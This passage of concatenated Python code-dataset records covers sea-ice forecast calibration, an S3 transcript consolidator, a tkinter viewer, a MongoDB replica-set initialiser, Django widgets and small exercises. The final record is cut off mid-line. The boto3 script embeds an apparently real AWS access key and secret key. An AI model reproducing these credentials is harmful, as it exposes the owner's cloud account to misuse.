int(i.quantity)\n                MatL.wood = round(MatL.wood + qtt, 2)\n                break\n        if declassified == 0:\n            qtt = random.randrange(200, 600)\n            qtt *= int(i.quantity)\n            MatL.plastic += qtt\n\n# random print to check the values\nprint(MatL.plastic, MatL.glass, MatL.textile, MatL.iron, MatL.aluminium, MatL.copper, MatL.gold, MatL.silver, MatL.wood,\n      MatL.porcelain, MatL.rubber, MatL.paper, MatL.groceries)\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7113,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
{"seq_id":"235148154","text":"\n#! pip install boto3\nimport boto3\nimport os\n\nimport pandas as pd\nimport re\n\nsession = boto3.Session(aws_access_key_id = 'AKIATJJR2V5VZLS2FLF7', aws_secret_access_key = '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')\ns3 = session.resource('s3')\nbucket = s3.Bucket('s3grouparmenia')\n\nfor file in bucket.objects.all():\n    if file.key.endswith('.txt'):\n        print(file.key)\n        break\n\ntranscripts = []\nyears = []\ncountries = []\nsessions = []\nyears_cleaned = []\n\nfor file in bucket.objects.all():\n    if file.key.startswith('data/Converted sessions'):\n        name = str(file.key)\n        if name.endswith('.txt'):\n            years.append(name.split('_')[-1])\n            sessions.append(name.split('_')[1])\n            countries.append(name.split('_')[0][-3:])\n            obj = file.get()['Body'].read()\n            transcripts.append(obj)\n\nfor year in years:\n    years_cleaned.append(year.replace('.txt', ''))\n\ndic = {\n    'Year': years_cleaned,\n    'Session': sessions,\n    'Country': countries,\n    'Transcript': transcripts\n}\n\ndf = pd.DataFrame(dic)\ndf.head()\n\ni = df.loc[df.Year == 'Store-to-UTF-8'].index\ndf.drop(i, inplace = True)\ndf.reset_index(drop=True, inplace=True)\ndf.info()\n\ndf.head()\n\ndf.to_csv('consolidated_transcripts.csv')\nbucket.upload_file(Filename = 'consolidated_transcripts.csv', Key = 'consolidated_transcripts.csv')\n\n","sub_path":"final_project_mda/codes/notebook/consolidating_transcripts.py","file_name":"consolidating_transcripts.py","file_ext":"py","file_size_in_byte":1269,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
{"seq_id":"399905011","text":"# -*- coding: utf-8 -*-\n\nfrom scipy.optimize import curve_fit\nfrom scipy.stats import beta, linregress\nimport numpy as np\nfrom beinf import beinf\n\nclass taqm():\n    '''\n    Contains the methods needed for performing trend-adjusted quantile mapping (TAQM).\n    It relies on the methods from the :class:`beinf` class.\n    \n    Methods Summary:\n    ----------------\n\n    ``calibrate(x_params,y_params,x_t_params,X,Y,X_t,trust_sharp_fcst=False)`` \n        calibrated forecast BEINF parameters and calibrated forecast ensemble\n    \n    ``fit_params(X,Y,X_t)`` \n        BEINF parameters for the TAMH, TAOH, and the raw forecast\n    \n    ``lin(a1,b1,T)`` \n        linear equation values\n    \n    ``piecewise_lin(a1,b1,a2,b2,t_b,T)`` \n        piece-wise linear equation values\n\n    ``trend_adjust_1p(data_all,tau_t,t)`` \n        trend-adjusted values using a single period\n    \n    ``trend_adjust_2p(data_all,tau_t,t,t_b=1999)`` \n        trend-adjusted values using two periods\n    \n    ``unpack_params(array)``\n        the individual parameters stored in array\n    \n    '''\n\n    def lin(self,a1,b1,T):\n        r\"\"\"Evaluates the linear equation\n        \n        .. 
math:: \n            z = a_1 T + b_1 \n            :label: pw1\n         \n        at :math:`T`.\n         \n        Args:\n            a1 (float):\n                The slope in :eq:`pw1`.\n             \n            b1 (float):\n                The z-intercept in\n                :eq:`pw1`.\n             \n            T (float or ndarray):\n                The point(s) at which :eq:`pw1` is evaluated.\n\n        Returns: z (float or ndarray):\n            The value of :eq:`pw1` at each point T. Values \n            less than 0 and greater than 1\n            are clipped to 0 and 1, respectively.\n        \"\"\"\n\n        #Linear equation\n        z = a1*T + b1 \n        #don't allow for SIC values less than zero or greater than 1\n        if np.any(z<0.0):\n            if isinstance(z,np.float64):\n                z = 0.0\n            else:\n                z[z<0.0] = 0.0\n         \n        if np.any(z>1.0):\n            if isinstance(z,np.float64):\n                z = 1.0 \n            else:\n                z[z>1.0] = 1.0\n         \n        return z\n\n    def piecewise_lin(self,a1,b1,a2,b2,t_b,T):\n        r\"\"\"Evaluates the piece-wise linear equation\n        \n        .. math:: \n            z = \\begin{cases} \n                a_1 T + b_1, & T<t_b \\\\\n                a_2 T + b_2, & T>t_b\n                \\end{cases} \n            :label: pw2\n         \n        at :math:`T`.\n         \n        Args:\n            a1, a2 (floats):\n                The slopes in :eq:`pw2`.\n             \n            b1, b2 (floats):\n                The z-intercepts in\n                :eq:`pw2`.\n             \n            t_b (float):\n                The breakpoint for :math:`z` in :eq:`pw2`.\n             \n            T (float or ndarray):\n                The point(s) at which :eq:`pw2` is evaluated.\n\n        Returns: z (float or ndarray):\n            The value of :eq:`pw2` at each point T. Values \n            less than 0 and greater than 1\n            are clipped to 0 and 1, respectively.\n        \"\"\"\n        if isinstance(T,np.ndarray):\n            #If T is an ndarray, z and T are arrays\n            z = np.zeros(T.shape)\n            z[T<t_b] = a1*T[T<t_b] + b1\n            z[T>=t_b] = a2*T[T>=t_b] + b2\n        else:\n            #If T is a single value (integer or float), z is a scalar\n            if T<t_b:\n                z = a1*T + b1\n            else:\n                z = a2*T + b2\n\n        #don't allow for SIC values less than zero or greater than 1\n        if np.any(z<0.0):\n            if isinstance(z,np.float64):\n                z = 0.0\n            else:\n                z[z<0.0] = 0.0\n\n        if np.any(z>1.0):\n            if isinstance(z,np.float64):\n                z = 1.0 \n            else:\n                z[z>1.0] = 1.0\n         \n        return z \n\n    def trend_adjust_1p(self,data_all,tau_t,t):\n        \"\"\"Linearly detrend data_all and re-center about its\n        linear least squares fit evaluated at \n        :math:`T=t`. One may want to use\n        this trend adjustment over :func:`~taqm.trend_adjust_2p` \n        if the hindcast record only covers the more recent period.\n        \n        Args:\n            data_all (ndarray):\n                A time series of size N, or an ensemble time series of size NxM,\n                where M is the number of ensemble members.\n            \n            tau_t (ndarray):\n                All hindcast years excluding the forecast year.\n\n            t (float):\n                The forecast year.\n        \n        Returns: data_ta (ndarray):\n            Trend-adjusted values with same shape as data_all.\n        \"\"\"\n        if np.ndim(data_all)>1:\n            # If data_all is shape N by M, take the mean across the M ensemble members (axis 1) \n            # for subsequent calculation of the linear least squares solution\n            data = np.mean(data_all,axis=1)\n        else:\n            data = np.copy(data_all) \n        \n        \n        if np.all(data_all==0.0) or np.all(data_all==1.0):\n            # If all values in data_all are either 0 or 1,\n            # no trend adjustment is needed\n            data_ta = np.copy(data_all)\n\n        else:\n            \n            #compute least squares parameters\n            m, b = linregress(tau_t,data)[:2]\n            \n            #non-stationary mean for year t \n            z_tilde_nsm = self.lin(m,b,t)\n            \n            if z_tilde_nsm<0.0:\n                z_tilde_nsm = 0.0\n            if z_tilde_nsm>1.0:\n                z_tilde_nsm = 1.0\n            \n            #detrend data and re-center\n            if np.ndim(data_all)>1:\n                data_d = data_all - self.lin(m,b,tau_t)[:,np.newaxis] \n                data_ta = data_d + z_tilde_nsm\n            else:\n                data_d = data_all - self.lin(m,b,tau_t)\n                data_ta = data_d + z_tilde_nsm\n            \n            #change values below zero (above one) to zero (one)\n            data_ta[data_ta<0.0] = 0.0\n            data_ta[data_ta>1.0] = 1.0 \n        \n        return data_ta\n\n    def trend_adjust_2p(self,data_all,tau_t,t,t_b=1999):\n        \"\"\"Piece-wise linearly detrend data_all and re-center it about its\n        non-linear least squares fit to Eq. 
:eq:`pw2` evaluated at \n :math:`T=t`. This method carries\n out the trend-adjustment technique described in section 5a\n of Dirkson et al, 2018. The non-linear least squares fit constrains\n Eq. :eq:`pw2` to be continuous at :math:`T=t_b`.\n \n Args:\n data_all (ndarray):\n A time series of size N, or an ensemble time series of size NxM,\n where M is the number of ensemble members.\n \n tau_t (ndarray):\n All hindcast years excluding the forecast year `t`.\n\n t (float):\n The forecast year.\n \n t_b (float):\n The breakpoint year in Eq. :eq:`pw2`.\n \n Returns: data_ta (ndarray):\n Trend-adjusted values with same shape as data_all.\n \"\"\"\n if np.ndim(data_all)>1:\n # If data_all has shape N by M, take the mean over the M ensemble members (ensemble mean) \n # for subsequent calculation of the linear least squares solution\n data = np.mean(data_all,axis=1)\n else:\n data = np.copy(data_all) \n \n \n if np.all(data_all==0.0) or np.all(data_all==1.0):\n # If all values in data_all are either 0 or 1,\n # no trend adjustment is needed\n data_ta = np.copy(data_all)\n\n else:\n # else, compute non-linear least squares \n # parameters of the piece-wise equation\n # and recenter data_all about this solution evaluated \n # at T = t \n def piecewise_regress(T,z):\n # function for computing least squares parameters\n def f_min(T,a1,b1,a2):\n # function for the piecewise linear equation\n # with continuity at t_b\n z_tilde = np.zeros(len(T))\n z_tilde[T<=t_b] = a1*T[T<=t_b] + b1\n z_tilde[T>t_b] = a2*T[T>t_b] + (a1-a2)*t_b + b1\n return z_tilde\n \n popt, pcov = curve_fit(f_min,T,z,p0=[1,1,1])\n a1,b1,a2 = popt\n b2 = (a1-a2)*t_b + b1\n \n return a1,b1,a2,b2\n \n #compute least squares parameters\n a1, b1, a2, b2 = piecewise_regress(tau_t,data)\n \n #non-stationary mean for year t \n z_tilde_nsm = self.piecewise_lin(a1,b1,a2,b2,t_b,t)\n \n if z_tilde_nsm<0.0:\n z_tilde_nsm = 0.0\n if z_tilde_nsm>1.0:\n z_tilde_nsm = 1.0\n \n #detrend data and re-center\n if np.ndim(data_all)>1:\n data_d = data_all - self.piecewise_lin(a1,b1,a2,b2,t_b,tau_t)[:,np.newaxis] \n data_ta = data_d + z_tilde_nsm\n else:\n data_d = data_all - self.piecewise_lin(a1,b1,a2,b2,t_b,tau_t)\n data_ta = data_d + z_tilde_nsm\n \n #change values below zero (above one) to zero (one)\n data_ta[data_ta<0.0] = 0.0\n data_ta[data_ta>1.0] = 1.0 \n \n return data_ta\n \n def fit_params(self,X,Y,X_t):\n '''\n Fits X (the TAMH ensemble time series), Y (the TAOH time series), and X_t (the raw forecast ensemble) to the BEINF\n distribution. This method carries out the fitting procedure described in \n section 5b of Dirkson et al, 2018.\n \n Args:\n X (ndarray):\n The TAMH ensemble time series of size NxM.\n \n Y (ndarray):\n The TAOH time series of size N.\n \n X_t (ndarray):\n The raw forecast ensemble of size M.\n \n Returns: x_params (ndarray), y_params (ndarray), x_t_params (ndarray):\n The shape parameters :math:`a`,\n :math:`b`, :math:`p`, :math:`q`\n for the BEINF distribution fitted to each \n X, Y, and X_t (see :meth:`beinf.fit`). 
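\n\n Example (illustrative only; here ``X``, ``Y``, and ``X_t`` stand for\n arrays shaped as described above):\n\n x_params, y_params, x_t_params = taqm().fit_params(X, Y, X_t)\n a_x, b_x, p_x, q_x = taqm().unpack_params(x_params)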
\n '''\n #Fit TAMH to the beinf distribution\n a_x, b_x, p_x, q_x = beinf.fit(X.flatten()) \n x_params = np.array([a_x, b_x, p_x, q_x])\n\n #fit TAOH to the beinf distribution\n a_y, b_y, p_y, q_y = beinf.fit(Y) \n y_params = np.array([a_y, b_y, p_y, q_y])\n\n #fit forecast to the beinf distribution\n a_x_t, b_x_t, p_x_t, q_x_t = beinf.fit(X_t)\n #store parameters in an array\n x_t_params = np.array([a_x_t, b_x_t, p_x_t, q_x_t])\n \n return x_params, y_params, x_t_params\n\n\n def calibrate(self,x_params,y_params,x_t_params,X,Y,X_t,trust_sharp_fcst=False):\n r'''\n Calibrates the raw forecast BEINF parameters :math:`a_{x_t}`,\n :math:`b_{x_t}`, :math:`p_{x_t}` and :math:`q_{x_t}`. This method \n carries out the calibration step described in section 5c in Dirkson et al, 2018.\n \n Args:\n x_params (ndarray):\n An array containing the four parameters of the BEINF distribution\n for the TAMH ensemble time series.\n\n y_params (ndarray):\n An array containing the four parameters of the BEINF distribution\n for the TAOH time series.\n \n x_t_params (ndarray):\n An array containing the four parameters of the BEINF distribution\n for the raw forecast ensemble.\n \n X (ndarray):\n The TAMH ensemble time series of size NxM.\n \n Y (ndarray):\n The TAOH time series of size N.\n \n X_t (ndarray):\n The raw forecast ensemble of size M.\n \n trust_sharp_fcst (boolean, optional):\n `True` to revert to the raw forecast when \n :math:`p_{x_t}=1`. `False` \n to revert to the TAOH distribution when :math:`p_{x_t}=1`.\n \n Returns: x_t_cal_params (ndarray), X_t_cal_beta (ndarray):\n x_t_cal_params contains the four BEINF\n distribution parameters for the calibrated forecast: :math:`a_{\\hat{x}_t}`, :math:`b_{\\hat{x}_t}`, \n :math:`p_{\\hat{x}_t}` and :math:`q_{\\hat{x}_t}`. When :math:`a_{\\hat{x}_t}` and :math:`b_{\\hat{x}_t}`\n could not be fit, they are returned as :code:`a=np.inf` and :code:`b=np.inf`.\n \n X_t_cal_beta contains the calibrated forecast ensemble (np.inf replaces 0's and 1's in the \n ensemble). This array contains all :code:`np.inf` values when any of :math:`p_y=1`,\n :math:`p_x=1`, or :math:`p_{x_t}=1`, or when all parameters in x_t_cal_params are defined (none are equal to :code:`np.inf`).\n \n '''\n \n a_x, b_x, p_x, q_x = x_params[0], x_params[1], x_params[2], x_params[3]\n a_y, b_y, p_y, q_y = y_params[0], y_params[1], y_params[2], y_params[3]\n a_x_t, b_x_t, p_x_t, q_x_t = x_t_params[0], x_t_params[1], x_t_params[2], x_t_params[3]\n \n #function to avoid returning nan when dividing by zero\n def safediv(numerator,denominator):\n if denominator==0.0:\n return 0.0\n else:\n return numerator/denominator \n \n #calibrate forecast parameters\n if p_y==1.0 or p_x==1.0 or p_x_t==1.0:\n # if any of TAMH, TAOH, or the forecast are entirely\n # comprised of zeros and ones, calibration cannot be done.\n # choices are: \n if np.logical_and(p_x_t==1.0,trust_sharp_fcst==True):\n # trust the raw forecast values when they are perfectly sharp\n a_x_t_cal, b_x_t_cal, p_x_t_cal, q_x_t_cal = np.copy(a_x_t), np.copy(b_x_t), np.copy(p_x_t), np.copy(q_x_t) \n else:\n # trust TAOH\n a_x_t_cal, b_x_t_cal, p_x_t_cal, q_x_t_cal = np.copy(a_y), np.copy(b_y), np.copy(p_y), np.copy(q_y)\n #in this case, there are no \"beta\" calibrated forecast values\n X_t_cal_beta = np.inf*np.ones(len(X_t))\n else:\n #calibrate the Bernoulli portion of the beinf forecast distribution\n p_x_t_cal = max(min(p_x_t + p_y - p_x,1.),0.) \n num = max(min(p_x_t*q_x_t + p_y*q_y - p_x*q_x,1.),0.)\n den = np.copy(p_x_t_cal)\n q_x_t_cal = max(min(safediv(num,den),1.),0.) 
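\n # The two preceding lines carry out the Bernoulli-part calibration described in the\n # docstring: p_x_t is shifted by the observed-minus-hindcast difference (p_y - p_x),\n # q_x_t by the analogous p*q combination, and both are clipped to [0, 1] by the\n # max(min(...)) guards; safediv() keeps q_x_t_cal at 0 when p_x_t_cal is 0.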
\n\n if p_x_t_cal==1.0:\n # if the calibration of p and q results in p=1 then there\n # should be no \"beta\" calibrated forecast values\n a_x_t_cal,b_x_t_cal = np.inf, np.inf\n X_t_cal_beta = np.inf*np.ones(len(X_t))\n else: \n # Get the values from the forecast ensemble, TAMH, and\n # TAOH that are between zero and one\n X_t_beta = np.copy(X_t[np.logical_and(X_t!=0.0,X_t!=1.0)]) \n X_beta = X[np.logical_and(X!=0.0,X!=1.0)].flatten()\n Y_beta = Y[np.logical_and(Y!=0.0,Y!=1.0)] \n\n # calibrate forecast SIC values \n # between zero and one using quantile mapping\n if a_x!=np.inf and a_y!=np.inf and a_x_t!=np.inf:\n rv_x_beta = beta(a_x, b_x, loc=0.0, scale=1.0 - 0.0)\n rv_y_beta = beta(a_y, b_y, loc=0.0, scale=1.0 - 0.0)\n # if none of cases 2-4 were encountered\n # for the raw forecast values\n X_t_cal_beta = rv_y_beta.ppf(rv_x_beta.cdf(X_t_beta)) \n else:\n #revert to empirical-based quantile mapping\n X_t_cal_beta = np.percentile(Y_beta,beinf.ecdf(X_t_beta,X_beta)*100.,interpolation='linear')\n \n # the quantile mapped values in the X_t_cal_beta array should never be zero or one,\n # but due to rounding in python this sometimes occurs. In these cases\n # change those values to epsilon or 1-epsilon. (epsilon=1e-12)\n X_t_cal_beta[X_t_cal_beta==0.0] = 1e-12 \n X_t_cal_beta[X_t_cal_beta==1.0] = 1.0 - 1e-12 \n\n cases = beinf.check_cases(X_t_cal_beta)\n #Solving of Eq. 8 (quantile mapping)\n if cases==False: \n a_x_t_cal, b_x_t_cal = beinf.fit_beta(X_t_cal_beta) \n X_t_cal_beta = np.inf*np.ones(len(X_t))\n else:\n a_x_t_cal, b_x_t_cal = np.inf, np.inf\n \n if len(X_t)!=len(X_t_cal_beta):\n X_t_cal_beta = np.append(X_t_cal_beta,np.inf*np.ones(len(X_t)-len(X_t_cal_beta)))\n\n x_t_cal_params = np.array([a_x_t_cal, b_x_t_cal, p_x_t_cal, q_x_t_cal])\n #Return BEINF distribution parameters \n return x_t_cal_params, X_t_cal_beta\n\n def unpack_params(self,array):\n '''\n Unpacks the individual parameters a, b, p, q from array.\n \n Args:\n array (ndarray):\n Array containing the four parameters a,b,p,q for\n a BEINF distribution.\n \n Returns: a,b,p,q (floats):\n The individual parameters for the BEINF distribution.\n '''\n a,b,p,q = map(lambda i: array[i], range(len(array)))\n return a,b,p,q\n","sub_path":"code/taqm.py","file_name":"taqm.py","file_ext":"py","file_size_in_byte":17892,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
+{"seq_id":"434819187","text":"from collections import defaultdict\nN = int(input())\ncnt = defaultdict(int)\n\nfor _ in range(N):\n cnt[input()] += 1\n\nmx = max(cnt.values())\ncnt = [s for s, n in cnt.items() if n == mx]\ncnt.sort()\n\nprint(*cnt, sep='\\n')\n","sub_path":"AtCoder/abc/155c.py","file_name":"155c.py","file_ext":"py","file_size_in_byte":221,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
+{"seq_id":"262575013","text":"import tkinter as tk\nfrom tkinter import filedialog\n\nfrom PIL import Image, ImageTk\n\n# To prevent image_accepter() from acting weird for multiple images\ni=0\nlabelv ={}\nphoto={}\nimage={}\nx={}\ny={}\n\n#Font tuple\nLARGE_FONT=(\"Roboto\",44)\n\n\n# base class to handle multiple pages\nclass SeaofBTCapp(tk.Tk):\n def __init__(self):\n tk.Tk.__init__(self)\n container=tk.Frame(self)\n container.pack(side=\"top\",fill=\"both\",expand=True)\n container.grid_rowconfigure(0,weight=1)\n container.grid_columnconfigure(0,weight=1)\n self.frames={}\n for F in (StartPage,PageOne):\n frame=F(container,self)\n self.frames[F]=frame\n 
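# every page Frame is stacked in the same grid cell below; show_frame()\n # then raises the requested page with tkraise(), swapping pages in place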
frame.grid(row=0,column=0,sticky=\"nsew\")\n self.show_frame(StartPage)\n def show_frame(self,cont):\n frame=self.frames[cont]\n frame.tkraise()\n\n# First page\nclass StartPage(tk.Frame):\n def __init__(self,parent,controller):\n tk.Frame.__init__(self,parent)\n\n label=tk.Label(self,text=\"Start Page\",font=LARGE_FONT)\n label.pack(padx=10,pady=10)\n button1=tk.Button(self,text=\"Visit page 1\",\n command=lambda : controller.show_frame(PageOne))\n button1.pack()\n# Second page\nclass PageOne(tk.Frame):\n def __init__(self,parent,controller):\n tk.Frame.__init__(self,parent)\n label=tk.Label(self,text=\"Page One\",font=LARGE_FONT)\n label.pack(padx=10,pady=10)\n\n\n button1 = tk.Button(self, text=\"Back to page one\",\n command=lambda: controller.show_frame(StartPage))\n button1.pack()\n button2 = tk.Button(self, text=\"Open Image\",\n command=self.image_accepter)\n button2.pack()\n def image_accepter(self):\n global photo,i,labelv,image,x,y\n i+=1\n # gets the image\n image[i]=Image.open(tk.filedialog.askopenfilename())\n # resizes the image\n image[i]=image[i].resize((150,150),Image.ANTIALIAS)\n # PhotoImage wrapper so Tk can display the PIL image\n photo[i] = ImageTk.PhotoImage(image=image[i])\n\n print(photo)\n # automatically add the imageTk to the frame\n labelv[i] = tk.Label(image=photo[i])\n if i==1:\n labelv[i].place(x=0)\n else:\n labelv[i].place(x=(i+200))\n\n\n\napp=SeaofBTCapp()\napp.mainloop()\n\n\n\n","sub_path":"temp.py","file_name":"temp.py","file_ext":"py","file_size_in_byte":2332,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
+{"seq_id":"460614098","text":"import logging\nimport os\nimport subprocess\n\nsubprocess.check_call('pip install pymongo', shell=True)\n\nimport pymongo\n\nlog = logging.getLogger(__name__)\nlog.setLevel(logging.DEBUG)\n\n\ndef initiate_mongodb_replicaset():\n mongo = pymongo.MongoClient(\n os.environ['MONGO_ADDRESS'],\n int(os.environ['MONGO_PORT']),\n )\n\n log.info(\"Initiating replicaset\")\n\n mongo.admin.command(\"replSetInitiate\", {\n '_id': 'rs01',\n 'members': [{'_id': 0, 'host': 'localhost:27017'}],\n })\n\n log.info(\"Success!\")\n\n\ndef main():\n log.info(\"Starting RocketChat Caboose\")\n try:\n initiate_mongodb_replicaset()\n except pymongo.errors.OperationFailure as e:\n if 'already initialized' in e.details['errmsg']:\n log.info('Done: already initialized.')\n return\n raise\n\n log.info(\"Done.\")\n\n\nif __name__ == '__main__':\n logging.basicConfig(\n level=logging.DEBUG,\n format='%(asctime)s %(levelname)s %(message)s',\n datefmt='%Y-%m-%d %H:%M:%S',\n )\n\n main()\n","sub_path":"templates/rocketchat-caboose.py","file_name":"rocketchat-caboose.py","file_ext":"py","file_size_in_byte":1045,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
+{"seq_id":"179158034","text":"# -*- coding: utf-8 -*-\r\n\r\nimport matplotlib.mlab as mlab\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\n\r\n# generate pseudo height data\r\nsample = 1000\r\nmu, sigma = 170, 5\r\ndata = np.random.normal(mu, sigma, sample)\r\n\r\n# draw the histogram\r\nn, bins, patches = plt.hist(data, normed=1, alpha=0.75, align='mid')\r\ny = mlab.normpdf(bins, mu, sigma)\r\nl = plt.plot(bins, y, 'r-', linewidth=1)\r\n\r\nplt.title(r'$\\mathrm{Histgram\\ of\\ Height:}\\ \\mu=%d,\\ \\sigma=%d$' % (mu, sigma))\r\nplt.xlabel('Height')\r\nplt.ylabel('Probability')\r\nplt.grid(True)\r\n\r\n# plt.show()\r\n# plt.savefig('/var/www/html/histgram.png')\r\nplt.savefig(r'c:\\Users\\akimi\\PycharmProjects\\python-exercise\\histgram.png') # 
the order is important.\r\nplt.show()","sub_path":"test-matplotlib2.py","file_name":"test-matplotlib2.py","file_ext":"py","file_size_in_byte":738,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
+{"seq_id":"477836092","text":"import math\nfrom itertools import chain\nfrom django import forms\nfrom django.forms.util import flatatt\nfrom django.forms import widgets\nfrom django.utils.encoding import force_unicode, force_text\nfrom django.utils.html import conditional_escape, format_html\nfrom django.utils.safestring import mark_safe\nfrom suit_redactor.widgets import RedactorWidget\nimport pdb\n\n\nclass SelectConDescripcion(widgets.Select):\n\n def __init__(self, attrs=None, choices=(), texto=None, readonly=False):\n super(SelectConDescripcion, self).__init__(attrs)\n self.texto = texto\n self.readonly = readonly\n self.choices = list(choices)\n\n def render(self, name, value, attrs=None, choices=()):\n if value is None:\n value = ''\n output = []\n options = self.render_options(choices, [value])\n\n final_attrs = self.build_attrs(attrs, name=name)\n\n if self.readonly is True:\n for k, v in self.choices:\n if k == 1:\n output.append(\"<p>{}</p>\".format(v))\n\n output.append(format_html(\n '<select{0} disabled>', flatatt(final_attrs)))\n else:\n output.append(format_html(\n '<select{0}>', flatatt(final_attrs)))\n\n if options:\n output.append(options)\n output.append('</select>')\n\n output.append('<span>' + self.texto + '</span>')\n return mark_safe('\\n'.join(output))\n\n\nclass RedactorSpanishWidget(RedactorWidget):\n class Media:\n css = {\n 'all': ('suit-redactor/redactor/redactor.css',)\n }\n js = (\n 'suit-redactor/redactor/redactor.min.js',\n 'js/admin/es_ar.js',\n )\n\n\nclass ColumnCheckboxSelectMultiple(forms.CheckboxSelectMultiple):\n \"\"\"\n Widget that renders multiple-select checkboxes in columns.\n Constructor takes number of columns and css class to apply\n to the
 <ul> elements that make up the columns.\n \"\"\"\n def __init__(self, columns=2, css_class=None, **kwargs):\n super(self.__class__, self).__init__(**kwargs)\n self.columns = columns\n self.css_class = css_class\n\n def render(self, name, value, attrs=None, choices=()):\n if value is None:\n value = []\n has_id = attrs and 'id' in attrs\n final_attrs = self.build_attrs(attrs, name=name)\n choices_enum = list(enumerate(chain(self.choices, choices)))\n \"\"\"\n This is the part that splits the choices into columns.\n Slices vertically. Could be changed to slice horizontally, etc.\n \"\"\"\n column_sizes = columnize(len(choices_enum), self.columns)\n columns = []\n for column_size in column_sizes:\n columns.append(choices_enum[:column_size])\n choices_enum = choices_enum[column_size:]\n output = []\n for column in columns:\n if self.css_class:\n output.append(u'<ul class=\"%s\">' % self.css_class)\n else:\n output.append(u'<ul>')\n # Normalize to strings\n str_values = set([force_unicode(v) for v in value])\n for i, (option_value, option_label) in column:\n \"\"\"\n If an ID attribute was given\n add a numeric index as a suffix,\n so that the checkboxes don't all have the same ID attribute.\n \"\"\"\n if has_id:\n final_attrs = dict(final_attrs, id='%s_%s' % (\n attrs['id'], i))\n label_for = u' for=\"%s\"' % final_attrs['id']\n else:\n label_for = ''\n\n cb = forms.CheckboxInput(\n final_attrs, check_test=lambda value: value in str_values)\n option_value = force_unicode(option_value)\n rendered_cb = cb.render(name, option_value)\n option_label = conditional_escape(force_unicode(option_label))\n output.append(u'<li><label%s>%s %s</label></li>' % (\n label_for, rendered_cb, option_label))\n output.append(u'</ul>
      ')\n return mark_safe(u'\\n'.join(output))\n\n\ndef columnize(items, columns):\n \"\"\"\n Return a list containing numbers of elements per column if `items` items\n are to be divided into `columns` columns.\n\n >>> columnize(10, 1)\n [10]\n >>> columnize(10, 2)\n [5, 5]\n >>> columnize(10, 3)\n [4, 3, 3]\n >>> columnize(3, 4)\n [1, 1, 1, 0]\n \"\"\"\n elts_per_column = []\n for col in range(columns):\n col_size = int(math.ceil(float(items) / columns))\n elts_per_column.append(col_size)\n items -= col_size\n columns -= 1\n return elts_per_column\n","sub_path":"dev/cent11/academica/widgets.py","file_name":"widgets.py","file_ext":"py","file_size_in_byte":4817,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"368441209","text":"'''Provided is a list of data about a store’s inventory where each item in the list represents the name of \nan item, how much is in stock, and how much it costs. Print out each item in the list with the same \nformatting, using the .format method (not string concatenation). For example, the first print statment \nshould read The store has 12 shoes, each for 29.99 USD.'''\n\ninventory = [\"shoes, 12, 29.99\", \"shirts, 20, 9.99\", \"sweatpants, 25, 15.00\", \"scarves, 13, 7.75\"]\n\nfor item in inventory:\n litem = item.split()\n product = litem[0]\n stock = litem[1]\n stockwc = stock[:len(stock)-1] #Stock without comma\n price = litem[2]\n product_resume = 'The store has {} {} each for {} USD.'.format(stockwc, product, price)\n print(product_resume)","sub_path":"Chapter_9/ex_9_19.py","file_name":"ex_9_19.py","file_ext":"py","file_size_in_byte":761,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"496933900","text":"#BEGIN HEADER\n\n#IsDebugged False\n#IsLocked True\n\n#/###################################/\n# Script giving functions allowing\n# a quick get of Sys modules with an\n# automatic import of the called one\n# if it was not already\n#/###################################/\n\n#END HEADER\n\ndef getModuleNameWithName(_Name):\n\t'''\n\t\tGet the conversions _Name to ModuleName\n\t'''\n\t\"\"\"\n\t\t#Print the ModuleName of the Functor module\n\t\tprint(_.getModuleNameWithName(\"Functor\");\n\t\"\"\"\n\treturn _Name+'PyModule';\n\ndef importModuleWithName(_Name):\n\t'''\n\t\tBuild the Basic Module Installer Method\n\t'''\n\t\"\"\"\n\t\t#Print before import\n\t\tprint(\"Is DirsParserModule imported : \"+str(sys.modules.has_key(_.getModuleNameWithName(\"DirsParser\"))));\n\n\t\t#Import a Module\n\t\tprint(\"Import DirsParser Module with importModuleWithName\");\n\t\t_.importModuleWithName(\"DirsParser\");\n\n\t\t#Print after import\n\t\tprint(\"Is DirsParserModule imported : \"+str(sys.modules.has_key(_.getModuleNameWithName(\"DirsParser\"))));\n\t\"\"\"\n\t\n\t#Build the Total PathString\n\tFolderPathString=_.getFolderPathStringWithName(_Name);\n\t\n\t#Look for already imported Module\n\tif (FolderPathString in sys.path)==False:\n\t\t\n\t\tprint(FolderPathString,os.path.isdir(FolderPathString))\n\t\t\n\t\t#Record only if the Path exists\n\t\tif os.path.isdir(FolderPathString):\n\t\t\n\t\t\t#Record the Path in sys\n\t\t\tsys.path.append(FolderPathString);\n\t\t\t\n\t\t\t#Import the Module\n\t\t\tModuleName=_.getModuleNameWithName(_Name);\n\t\t\t\n\t\t\t#Get the ModuleFilePathString just for checking\n\t\t\tModuleFilePathString=FolderPathString+ModuleName+'.py'\n\t\t\t\n\t\t\t#Import if the file exists\n\t\t\tif 
